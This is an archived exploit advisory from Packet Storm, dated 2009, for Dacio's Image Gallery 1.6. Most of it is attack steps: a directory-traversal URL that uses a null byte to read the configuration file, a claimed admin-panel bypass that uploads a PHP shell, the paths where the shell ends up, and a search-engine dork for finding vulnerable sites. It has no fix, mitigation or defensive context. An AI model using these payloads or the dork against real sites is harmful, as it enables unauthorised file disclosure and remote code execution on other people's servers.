Dacio's Image Gallery 1.6 Traversal / Shell Upload

2009-05-11T00:00:00
ID PACKETSTORM:77395
Type packetstorm
Reporter ahmadbady
Modified 2009-05-11T00:00:00

Description

                                        
                                            `=-=-Local Directory Traversal/bypass/shell upload/-=-=  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=  
script::Dacio_imgGal-v1.6  
-------------------------------------------------  
Author: ahmadbady  
my site :Coming Soon  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
download from:http://www.kopicaidej.net/index.php?com=hex&Dld=59  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Directory Traversal:  
  
/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00  
------  
bypass and upload:  
  
go to admin.php(Panel Bypassed) and add image (shell upload)   
  
shell: /images/beauty_1/shell.php if deleted beauty_1  
  
create a new gallery  
  
example aa:  
  
shell: /images/aa/shell.php  
-----   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=  
dork: intitle:"Dacio's Image Gallery"  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=  
  
  
  
`